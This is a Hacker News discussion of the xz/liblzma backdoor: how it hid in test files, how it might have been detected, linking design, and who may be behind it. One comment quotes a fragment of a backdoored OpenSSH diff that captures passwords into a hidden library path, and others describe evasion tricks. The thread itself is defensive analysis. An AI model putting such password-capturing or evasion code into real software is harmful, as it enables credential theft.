git.tukaani.org runs sshd. If that sshd was upgraded with the xz backdoor, we cannot exclude that the host was compromised as it could be have been a obvious target for the backdoor author.
Rather unlikely. The bad actor never had access to git.tukaani.org, and the sshd version running on that host is:
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u3
That is, a stable Debian release. Definitely not one with liblzma5:5.6.xSo this is why Apple hates open source. Random anons committing to your project.
I think their problem with open source is more that they can't have complete control and make every user's decision for them, security is just a nice tag along to that.
So is this backdoor active in Ubuntu distributions?
It appears not.
It just seems implausible that the malicious x86 code would not have shown up in strace, perf record, or some backtrace. Once this ended up in all the major distros, some syscall or glibc call would have eventually looked like a red flag to someone before long.
SE Linux comment by @poettering, https://news.ycombinator.com/item?id=39867126
> Libselinux pulls in liblzma too and gets linked into tons more programs than libsystemd. And will end up in sshd too (at the very least via libpam/pam_selinux). And most of the really big distros tend do support selinux at least to some level. Hence systemd or not, sshd remains vulnerable by this specific attack.
Devuan comment by @capitainenemo, https://news.ycombinator.com/item?id=39866190
> The sshd in Devuan does link to a libsystemd stub - this is to cut down on their maintenance of upstream packages. However that stub does not link to lzma.
Future proofing, https://gynvael.coldwind.pl/?lang=en&id=782
Stage 2 "extension" mechanism
This whole thing basically looks like an "extension/patching" system that would allow adding future scripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which makes sense, as modyfing a "bad" and "good" test files over and over again is pretty suspicious. So the plan seemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.
Who was the author ?
Maybe we should consider moving more and more system process to webassembly. wasmtime has a nice sandbox. Surely it will decrease the performance, but performance is not always that important. For example, on my dev machine even if SSHD or apache's performance dropped 3x because of that, I wouldn't mind. If I really care, spend more money to get a more powerful CPU.
Lessons learned from an SSH backdoor:
https://pcao.substack.com/p/a-tale-of-an-ssh-backdoor-and-re...
The recent backdoor in XZ leading to Secure Shell (SSH) server compromise is still evolving [1,2,3]. For open-networked environments such as HPC or supercomputers, login nodes are particularly vulnerable. This XZ backdoor reminds us of lessons learned from previous security incidents [4] and stipulates important community discussions below.
The SSH backdoor security incident
In April 2018, NCSA's security team was notified of suspicious activity on a multiuser host supporting a major science project.
The source code of the backdoor in one instance of OpenSSH’s sshconnect2.c is listed below.
openssh/sshconnect2.c (diff output)
int userauth_passwd(Authctxt authctxt){ + mode_t u; + char file_path = "/usr/lib64/.lib/lib64.so";
+ strcat(out, password);
+ } }
[1] backdoor in upstream xz/liblzma leading to ssh server compromise, https://www.openwall.com/lists/oss-security/2024/03/29/4
[2] Reported Supply Chain Compromise Affecting XZ Utils Data Compression Library, CVE-2024-3094, https://www.cisa.gov/news-events/alerts/2024/03/29/reported-...
[3] Urgent security alert for Fedora Linux 40 and Fedora Rawhide users, https://thehackernews.com/2024/03/urgent-secret-backdoor-fou...
[4] CAUDIT: Continuous Auditing of SSH Servers To Mitigate Brute-Force Attacks
Phuong Cao, Y Wu, SS Banerjee, J Azoff, A Withers, ZT Kalbarczyk, RK Iyer
16th USENIX Symposium on Networked Systems Design and Implementation (NSDI)
We basically need to analyse dependencies used in critical code paths (e.g. network attached services like sshd) and then start a process to add more rigorous controls around them. Some kind of enhanced scrutiny, certification and governance instead of relying on repos with individual maintainers and no meaningful code reviews, branch protection, etc.
And by we I mean at international/governmental level. Free software needs to stop being $free.
Society needs to start paying for the critical foundations upon which we all stand.
Whilst we are in 3bp mode, what happen if a state actor want to harm open source … not to destroy it but to pollute it … as said you can check and test all. Legal … they do not care.
I wonder.
… We are all good vs even Buddha has evil nature mental model.
It's weird now that "it's right there in the open",
Listed among the most recent commits there is "update two test files" https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6e636819e8f...
And it's kind of smart to attack a compression library - you have plausible deniability for these opaque binary blobs - they are supposedly test cases, but in reality encode parts of the backdoor.
Doesn’t certificate verification occur in PrevSep process? If so, this would only grant RCE with nobody’s privilege.
So this is called the house of cards backdoor now?
This was so bizarre I had to check twice that it isn't actually April 1 (I'm in Asia so I get a lot of off-by-one-day stories from the US)
Why does xz need new features at this point?
Untill the entire scope of this is identified I suggest activating the kill switch
https://bcksp.blogspot.com/2024/03/how-to-disable-xz-backdoo...
I expect a lot of people will be doing a whole lot of thinking along these lines over the next months.
Code review? Some kind of behavioral analysis?
IMO the call to system() was kind of sloppy, and a binary capabilities scanner could have potentially identified a path to that.
I think behavioral analysis could be promising. There's a lot of weird stuff this code does on startup that any reasonable Debian package on the average install should not be doing in a million years.
Games and proprietary software will sometimes ship with DRM protection layers that do insane things in the name of obfuscation, making it hard to distinguish from malware.
But (with only a couple exceptions) there's no reason for a binary or library in a Debian package to ever try to write the PLT outside of the normal mechanism, to try to overwrite symbols in other modules, to add LD audit hooks on startup, to try to resolve things manually by walking ELF structures, to do anti-debug tricks, or just to have any kind of obfuscation or packing that free software packaged for a distro is not supposed to have.
Some of these may be (much) more difficult to detect than others, some might not be realistic. But there are several plausible different ways a scanner could have detected something weird going on in memory during ssh startup.
No one wants a Linux antivirus. But I think everyone would benefit from throwing all the behavioral analysis we can come up with at new Debian package uploads. We're very lucky someone noticed this one, we may not have the same luck next time.
ClamAV has been around for a very long time at this point.
It's just not installed on servers, usually
don't most people who use that just use it for scanning incoming email attachments usually?
ClamAV also has a lot of findings when scanning some open source project's source code. For example, LLVM project's test data. Because some of the test data are meant to check if a known security bug is fixed, from a antivirus software perspective these data files can be seen as exploits. ClamAV is commonly used. Or, I would suggest adding it to every CI build pipeline. Most time it wouldn't have any finding, but it is better than nothing. I would like to offer free help if an open source project has the need to harden their build pipelines and their release process.
Does not have to be installed. See this: https://learn.microsoft.com/en-us/azure/defender-for-cloud/c...
A cloud provider can take snapshots of running VMs then run antivirus scan offline to minimize the impact to the customers.
Similarly, many applications are containerized and the containers are stateless, we can scan the docker images instead. This approach has been quite mature.
In general, my gut feeling is that I expect the majority ClamAV installations to be configured to scan for Windows viruses in user submitted content. Email, hosting sites, etc.
To say nothing of enterprise EDR/XDR solutions that have linux versions. These things aren’t bulletproof but can be 1 layer in your multilayer security posture.
Except had we been doing that they would have put guards in place to detect it - as they already had guards to avoid the code path when a debugger is attached, to avoid building the payload in when it's not one of the target systems, and so on. Their evasion was fairly extensive, so we'd need many novel dynamic systems to stand a chance, and we'd have to guard those systems extremely tightly - the author got patches into oss-fuzz as well to "squash false positives". All in all, adding more arms to the arms race does raise the bar, but the bar they surpassed already demonstrated tenacity, long term thinking, and significant defense and detection evasion efforts.
I broadly agree, but I think we can draw a parallel with the arms race of new exploit techniques versus exploit protection.
People still manage to write exploits today, but now you must find an ASLR leak, you must chain enough primitives to work around multiple layers of protection, it's generally a huge pain to write exploits compared to the 90s.
Today the dynamic detection that we have for Linux packages seems thin to non-existent, like the arms race has not even started yet. I think there is a bit of low-hanging fruit to make attacker lives harder (and some much higher-hanging fruit that would be a real headache).
Luckily there is an asymmetry in favor of the defenders (for once). If we create a scanner, we do not _have_ to publish every type of scan it knows how to do. Much like companies fighting spammers and fraud don't detail exactly how they catch bad actors. (Or, for another example, I know the Tor project has a similar asymmetry to detect bad relays. They collaborate on their relay scanner internally, but no one externally knows all the details.)
This is an arms race that is largely won by attackers, actually. Sophisticated attacks are caught by them sometimes but usually the author has far more knowledge or cleverer tricks than the person implementing the checks, who is limited by their imagination of what they think an attacker might do.
Yeah, perhaps something akin to an OSS variant of virustotal's multi-vendor analysis. I'm still not sure it would catch this, but as you say, raising the bar isn't something we tend to regret.
If the prior is 1 was out there (this one), the chances that there is 1+ still undetected seems fairly high to me.
To behaviourally detect this requires many independent actors to be looking in independent ways(e.g. security researchers, internal teams). Edit: I mean with private code & tests (not open source, nor purchasable antivirus). It's not easy to donate to Google Zero. Some of the best funded and most skilled teams seem to be antivirus vendors (and high value person protection). I hate the antivirus industry yet I've been helped by it (the anti-tragedy of the commons).
Commonly public detection code (e.g. open source) is likely to be defeated by attackers with a lot of resources.
Hard to protect ourselves against countries where the individuals are safe from prosecution. Even nefarious means like assasination likely only work against individuals and not teams.
That would surprise me greatly
I think you’re saying “I would be surprised if there is only 1 exploit like this that already exists” which is what the previous comment was also saying. “If the prior is one” is often used to mean “we know for sure that there is one”.
Sorry, I'm unfamiliar with PLT what does stand for?
procedure linkage table
I want to name one thing: when Windows failed to load a DLL because a dependency was missing, it doesn't tell you what was missed. To get the information, you have to interact with the DLL loader with low level Windows APIs. In some circumstances Linux apps may also have the need. Like for printing a user friendly error message or recovery from a non-fatal error. For example, the patchelf tool that is used for building portable python packages.
It is not true. Actually these software are very popular in enterprise settings.
Why "new uploads" and not also "all existing"?
Dynamic linking was a mistake and should be eliminated
That this was dynamically linked is the least interesting thing about it IMO. It was a long term I filtration where they got legitimate commit access to a well used library.
If xz was statically linked in some way, or just used as an executa Le to compress something (like the kernel), the same problems exist and no dynamic linking would need to be involved.
Not true, it would be much harder to hook into openssl functions if the final executable was static [1], the only way is that if the openssl function this attack targeted, actually called a function from libxz.
[1] https://sourceware.org/glibc/wiki/GNU_IFUNC
Dynamic loading is relic of the past and cause of many headaches in linux ecosystem, in this case it also just obfuscates the execution path of the code more so you can't really rely on the code you are reading. Unfortunately I don't think it's possible to completely get rid of dynamic loading as some components such as GPU drivers require it, but it should be reduced to minimum.
Looking at IFUNC, there never seems to be a reason to allow function loading from a different library than the one the call is in, right? Maybe a restriction like that could be built in. Or just explicitly enumerate the possible substitutions per site.
Sure, but your solution supposes some kind of linking cop program overseeing the linking process, and who is going to keep the linking cop honest?
I mean dynamic loader is part of the base system and you generally trust the compiler and linker you build the program with. If any of those are malicious, you've already lost the game.
Asking a programmer to trust his own compiler and libraries which he can personally analyze and vouch for (static linking) is much different than asking the programmer to vouch for the dynamic libraries present on some given user’s machine.
This particular approach of hooking would be much harder; but a malicious xz has other options as well. It's already in the code path used by dpkg when unpacking packages for security updates, so it could just modify the sshd binary, or maybe add a rootkit to the next kernel security update.
It seems foolish to change our systems to stop one of the steps the attacker used after their code was already running as root; the attacker can just pick something else; as root they have essentially unlimited options.
“It seems foolish to change”
Rejecting evidence in favor of retaining preconceptions is certainly popular.
True, but such code changes in xz would be much easier to audit than all the dynamic loading shenanigans, even if obfuscated in the build system. The GNU's dynamic loader specially has grown to be very complicated (having all these OOP-like polymorphism features on linker / loader level ...) and I think we should tone down the usage of dynamic linking as I see it as low hanging fruit for attacks in general.
even more so: all binaries dynamically linking xz can be updated by installing a fixed library version. For statically linked binaries: not so much, each individual binary would have to be relinked, good luck with that.
In exchange, each binary can be audited as a final product on its own merits, rather than leaving the final symbols-in-memory open to all kinds of dubious manipulation.
Is essentially what all distros with sane build systems does.
yep, but how to reverse such a blunder?
Well step one is to just stop doing it? I guess someone will need to start publishing a static-only linux distro
The real problem was doing expensive math for every connection. If it had relied on a cookie or some simpler-to-compute pre-filter, no one would have been the wiser.
The slowdown is actually in the startup of the backdoor, not when it's actually performing authentication. Note how in the original report even sshd -h (called in the right environment to circumvent countermeasures) is slow.
Wow. Given the otherwise extreme sophistication this is such a blunder. I imagine the adversary is tearing their hair out over this. 2-3 years of full time infiltration work down the drain, for probably more than a single person.
As for the rest of us, we got lucky. In fact, it’s quite hilarious that some grump who’s thanklessly perf testing other people’s code is like “no like, exploit makes my system slower”.
You're responding to said grump ;)
Andres is one of the most prolific PostgreSQL committers and his depth of understanding of systems performance is second to none. I wouldn't have guessed he would one day save the world with it, but there you go.
If it was not fulltime work I wonder what else they have been working on with different accounts.
If you think about it this is a data-providence problem though. The exploit was hidden in "test" code which gets included in release code by compiler flags.
Now, if there was a proper chain of accountability for data, then this wouldn't have been possible to hide the way it is - any amount of pre-processing resulting in the release tarball including derived products of "test" files would be suspicious.
The problem is we don't actually track data providence like this - no build system does. The most we do is <git hash in> -> <some deterministic bits out>. But we don't include the human readable data which explains how that transform happens at enough levels.
You don’t need to go to that extent even - simply properly segregating test resources from dist resources would have prevented this, and that’s something Java has been doing for 20 years.
It’s not sufficient against a determined attacker, but it does demonstrate just how unserious the C world is about their build engineering.
I literally can’t think of a single time in 15 years of work that I’ve ever seen a reason for a dist build to need test resources. That’s at best a bug - if it’s a dist resource it goes in the dist resources, not test. And if the tooling doesn’t do a good job of making that mistake difficult… it’s bad tooling.
the call to system is obfuscated, static analysis wouldn't see it
I'm really surprised they did a call to system() rather than just implement a tiny bytecode interpreter.
A bytecode interpreter that can call syscalls can be just a few hundred bytes of code, and means you can avoid calling system() (whose calls might be logged), and avoid calling mprotect to make code executable (also something likely to raise security red flags).
The only downside of a bytecode interpreter is the whole of the rest of your malware needs to be compiled to your custom bytecode to get the benefits, and you will take a pretty big performance hit. Unless you're streaming the users webcam, that probably isn't an issue tho.
I’ve been building Packj [1] to detect malicious PyPI/NPM/Ruby/PHP/etc. dependencies using behavioral analysis. It uses static+dynamic code analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect bad actors (e.g., typo squatting).
1. https://github.com/ossillate-inc/packj
At least for some comic relief I'd like to imagine Jia's boss slapping him and saying something like "you idiot, we worked on this for so many years and you couldn't have checked for any perf issues?"
But seriously, we could have found ourselves with this in all stable repos: RHEL, Debian, Ubuntu, IoT devices 5 years from now and it would have been a much larger shit show.
Maybe they didn't have time to test? They could have been scrambling to make it into timed releases such as Ubuntu 24.04 or Fedora 40.
There is one possible time pressure involved, which is that libsystemd dropped the liblzma dependency
Absolutely no intelligence agency would look at a successful compromise where they have a highly positioned agent in an organization like this, and burn them trying to rush an under-developed exploit in that would then become not useful almost immediately (because the liblzma dependency would be dropped next distro upgrade cycle).
If you had a human-asset with decision making authority and trust in place, then as funded organization with regular working hours, you'd simply can the project and start prototyping new potential uses.
Might a time-sensitive high-priority goal override such reasoning? For example, the US presidential election is coming up. Making it into Ubuntu LTS could be worth the risk if valuable government targets are running that.
Jia Tan tried to get his backdoored XZ into Ubuntu 24.04 just before the freeze, so that makes sense. Now is about the right time to get it into Fedora if he wants to backdoor RHEL 10, too.
But I don't think valuable government targets are in any hurry to upgrade. I wouldn't expect widespread adoption of 24.04, even in the private sector, until well after the U.S. election.
By the next election, though, everyone will be running it.
Edit: According to another comment [1], there would only have been a short window of vulnerability during which this attack would have worked, due to changes in systemd. This might have increased pressure on the attacker to act quickly.
[1] https://news.ycombinator.com/item?id=39881465
No true Scotsman
Presumably this intelligence agency have multiple such initiatives and can afford to burn one to achieve a goal.
On the other hand, this was a two year long con..
Surely this is something the FBI should be involved with? Or some authority?
sure. what makes you think they aren't?
Why would the FBI investigate the NSA? We have zero idea who the actors involved are.
It's not actually unusual for three-letter US agencies to be at odds with one another.
But one possible reason is if the FBI is convinced that something the NSA is doing is illegal. They may not always be inclined to tolerate that.
You would have to agree that it was possible for the government to break the law. And what the repercussions are when that happens.
I'd noticed that; this seems to have been the case for a long time. You'd think that having state security agencies at war with one-another would be a disaster, but perhaps it's a feature: a sort of social "layered security". At any rate, it seems much better than having a bunch of state security agencies that all sing from the same songsheet.
my comment allows for the NSA to be involved in this and for the FBI to not be investigating them.
Probably the FBI for the public part of it, but if this wasn't a US owned operation you can be sure the CIA/NSA/military will do their own investigation.
This was the backdoor we found. We found the backdoor with performance issues.
Whats more likely - that this is the only backdoor like this in linux, or that there are more out there and this is the one we happened to find?
I really hope someone is out there testing for all of this stuff in linux:
- Look for system() calls in compiled binaries and check all of them
- Look for uses of IFUNC - specifically when a library uses IFUNC to replace other functions in the resulting executable
- Make a list of all the binaries / libraries which don't landlock. Grep the sourcecode of all those projects and make sure none of them expect to be using landlock.
All of this was obfuscated. None of this will be detectable with current static analysis techniques.
IFUNC and landlock could be debugged pretty easily at runtime, just by adding some instrumentation.
Think about backdoors that are already present and will never be found out.
If the exploit wasn't baing used, the odds would would be pretty low. They picked the right place to bury it (i.e., effectively outside the codebase, where no auditor ever looks).
That said, if you're not using it, it defeats the purpose. And the more you're using it, the higher the likelihood you will be detected down the line. Compare to Solarwinds.
I suspect I could have used this exact attack against 10,000 random SSH servers spread all over the world, and not be detected.
Most people don't log TCP connections, and those that do don't go through their logs looking for odd certificates in ssh connections.
And no common logging at the ssh/pam level would have picked this up.
Your only chance is some sysadmin who has put 'tripwires' on certain syscalls like system(), fork() or mmap() looking for anything unusual.
Even then, they might detect the attack, yet have no chance at actually finding how the malicious code loaded itself.
There is no ‘system()’ syscall, and fork/exec would be extremely common for opensshd — it’s what it does to spawn new shells which go on to do anything.
I’m not arguing with the point, but this is a great place to hide — very difficult to have meaningful detection rules even for a sophisticated sysadmin.
This would be execve() that did not go through PAM dance and end up being privileged process.
I _think_ it’ll look very different in ps —-forest output.
It’s true that there’s a precise set of circumstances that would be different for the RCE (the lack of a PAM dance prior, same process group & session, no allocation of a pseudo-terminal, etc.). My point was merely that I don’t think they are commonly encoded in rule sets or detection systems.
It’s certainly possible, but my guess is sshd is likely to have a lot of open policy. I’m really curious if someone knows different and there are hard detection for those things. (Either way, I bet there will be in the future!)
I am trying to figure out if auditctl is expressive enough to catch unexpected execve() from sshd: basically anything other than /usr/bin/sshd (for privsep) executed with auid=-1 should be suspicious.
With sufficient data points, you can do A/B and see that all affected systems run a specific version of Linux distro, and eventually track it down to a particular package.
Unless you're the bad actor, you have no way to trigger the exploit, so you can't really do an a/b test. You can only confirm which versions of which distros are vulnerable. And that assumes you have sufficient instrumentation in place to know the exploit has been triggered.
Even then, who actually has a massive fleet of publicly exposed servers all running a mix of distros/versions? You might run a small handful of distros, but I suspect anyone running a fleet large enough to actually collect a substantial amount of data probably also has tools to upgrade the whole fleet (or at least large swaths) in one go. Certainly there are companies where updates are the wild west, but the odds that they're all accessible to and controllable by a single motivated individual who can detect the exploit is essentially zero.
There are those who run sshd on a non-standard port and log all attempts to connect to the standard port though.
Not if this was injected by a state actor. My experience with other examples of state actor interference in critical infrastructure, is that the exploit is not used. It’s there as a capability to be leveraged only in the context of military action.
And that leads to the question:
Why do non-friendly state actors (apparently) not detect and eliminate exploits like this one?
Supposedly, they should have the same kind of budgets for code review (or even more, if we combine all budgets of all non-friendly state actors, given the fact that we are talking about open-source code).
How to you know they don't?
When a state actor says "We found this exploit", people will get paranoid and wondering if the fix is actually an exploit.
Not saying it happened in this case, but it's really easy for a state actor to hide an extensive audit behind some parallel construction. Just create a cover story pretending to be a random user who randomly noticed ssh logins being slow, and use that story to point maintainers to the problem, without triggering anyone's paranoia, or giving other state actors evidence of your auditing capabilities.
If a government is competent enough to detect this, they're competent enough to add it to their very own cyberweapon stockpile.
They wouldn't be able to do that for this particular exploit since it requires successfully decrypting data encrypted by the attacker's secret key. A zero day caused by an accidental bug though? There's no reason for them to eliminate the threat by disclosing it. They can patch their own systems and add yet another exploit to their hoard.
Hmmh, brings up the question, if no exploit actually occurred, was a crime committed? Can't the authors claim that they were testing how quickly the community of a thousand eyes would react, you know, for science?
That's like asking if someone that went into a crowded place with a full-automatic and started shooting at people but "purposefully missing" is just testing how fast law enforcement reacts, you know, for science.
After something like 2 years of planning this out and targeted changes this isn't something "just done for science".
Or is it rather like someone posting a video on youtube on how to pick a common lock?
And what's about the fellows of U of Minnesota?
It’s more analogous to getting hired at the lock company and sabotaging the locks you assemble to be trivially pickible if you know the right trick.
The University of Minnesota case is an interesting one to compare to. I could imagine them being criminally liable but being given a lenient punishment. I wonder if the law will end up being amended to better cover this, if it isn’t already explicitly illegal.
Well, software supply chains are a thing.
"where no auditor ever is paid to look" would be more correct.
Not always. Weapons of war are most useful when you don't have to actually use them, because others know that you have it. This exploit could be used sparingly to boost a reputation of a state-level actor. Of course, other parties wouldn't know about this particular exploit, but they would see your cyber capabilities in the rare occasions where you decided to use it.
The purpose would presumably be to use this about an hour before the amphibious assault on $WHEREVER begins
Working for about a year in an environment that was exposed to high volume of malevolent IT actors (and some pretty scary ones) I’d say: discovery chances very always pretty high.
Keeping veil of secrecy requires unimaginable amount of energy. Same goes with truth consistency. One little slip and everything goes to nothing. Sometimes single sentence can start a chain of reaction and uncover meticulous crafted plan.
That’s how crime if fought every day. Whereas police work has limited resources, software is analyzed daily by hobbyists as a hobby, professionals who still do it for a hobby, and professionals for professional reasons.
Discovery was bound to happen eventually.
XZ attack was very well executed. It’s a master piece. I wouldn’t be surprised if some state agencies would be involved. But it also was incredibly lucky. I know for sure for myself, but also many of my colleagues would go into long journey if found any of issues that are flagged right now.
One takeaway is that chance of finding such issue would be impossible if xz/liblzma wouldn’t be open source (and yes I am also aware it enabled it in the first place) but imagine this existing in Windows or MacOS.
it took roughly two years including social engineering.
I'd say the same approach is much easier in a big software company.
How do you mean?
I bet in the majority of cases, there's no need to pressure for merging.
In a big company it's much easier to slip it in. Code seemingly less relevant for security is often not reviewed by a lot of people. Also, often people don't really care and just sign it off without a closer look.
And when it's merged, no one will ever look at it again, other than with FOSS.
I think you nailed it.
I've read about workplaces that were compromised with multiple people - they would hire a compromised manager, who would then install one or two developers, and shape the environment for them to prevent discovery, which would make these kind of exploits trivial.
so, Office Space?
Since a liblzma backdoor could be used to modify compiler packages that are installed on some distributions, it gets right back to a trusting trust attack.
Although initial detection via eg strace would be possible, if the backdoor was later removed or went quiescentit would be full trusting trust territory.
How would this be possible? This backdoor works because lzma is loaded into sshd (by a roundabout method involving systemd). I don't think gcc or clang links lzma.
To be fair neither does sshd. But I'm sure someone somewhere has a good reason for gcc to write status via journald or something like that? There's however no reason to limit yourself to gcc for a supply chain attack like this.
In any non trivial build system, there's going to be lots of third party things involved. Especially when you include tests in the build. Is Python invoked somewhere along the build chain? That's like a dozen libraries loaded already.
Nothing is gained from protecting against an exact replica of this attack, but from this family of attacks.
servers hosting gcc binaries are accessed using ssh
dpkg-deb is linked with liblzma
When the backdoor is loaded by sshd it could modify the gcc/clang install, or some system header file.
I think this would’ve been difficult to catch because the patching of sshd happens during linking, when it’s permissible, and if this is correct then it’s not a master key backdoor, so there is no regular login audit trail. And sshd would of course be allowed to start other processes. A very tight SELinux policy could catch sshd executing something that ain’t a shell but hardening to that degree would be extremely rare I assume.
As for being discovered outside the target, well we tried that exercise already, didn’t we? A bunch of people stared at the payload with valgrind et al and didn’t see it. It’s also fairly well protected from being discovered in debugging environments, because the overt infrastructure underlying the payload is incompatible with ASan and friends. And even if it is linked in, the code runs long before main(), so even if you were prodding around near or in liblzma with a debugger you wouldn’t normally observe it execute.
e: sibling suggests strace, yes you can see all syscalls after the process is spawned and you can watch the linker work. But from what I’ve gathered the payload isn’t making any syscalls at that stage to determine whether to activate, it’s just looking at argv and environ etc.
One idea may be to create a patched version of ld-linux itself with added sanity checks while the process loads.
For something much more heavy-handed, force the pages in sensitive sections to fault, either in the kernel or in a hypervisor. Then look at where the access is coming from in the page fault handler.
I don't think you can reliably differentiate a backdoor executing a command, and a legitimate user logged in with ssh running a command once the backdoor is already installed. But the way backdoors install themselves is where they really break the rules.
Huh, ssh executes things that aren't shells all the time during normal operation. No? i.e. 'ssh myserver.lan cat /etc/fstab'
Can I ask for why it wouldn't have been discovered if the obvious delay wasn't present? Wouldn't anyone profiling a running sshd (which I have to imagine someone out there is doing) see it spending all its crypto time in liblzma?
The situation certainly wouldn't be helped by the fact that this exploit targeted the systemd integration used by Debian and Red Hat. OpenSSH developers aren't likely to run that since they already rejected that patch for the increased attack surface. Hard to argue against, in retrospect. The attack also avoids activation under those conditions a profiler or debugger would run under.
I think one interesting corollary here is how the Ken Thompson attack was discovered at PWB[0] because it had a memory performance bug[1].
Using a jump host could help, only allowing port forwarding. Ideally it would be heavily monitored and create a new instance for every connection (e.g., inside a container).
The attacker would then be stuck inside the jump host and would have to probe where to connect next. This hopefully would then trigger an alert, causing some suspicion.
A shared instance would allow the attacker to just wait for another connection and then follow its traces, without risking triggering an alert by probing.
The ideal jump host would allow to freeze the running ssh process on an alert, either with a snapshot (VM based) or checkpointing (container based), so it can be analyzed later.
Backdoors can be placed in any type of software. For example, a GIMP plugin could connect to your display and read keystrokes, harvest passwords, etcetera. Utilities run by the superuser are of course even more potentially dangerous. Supply-chain attacks like these are just bound to happen. Perhaps not as often in SSH which is heavily scrutinized, but the consequences can be serious nevertheless.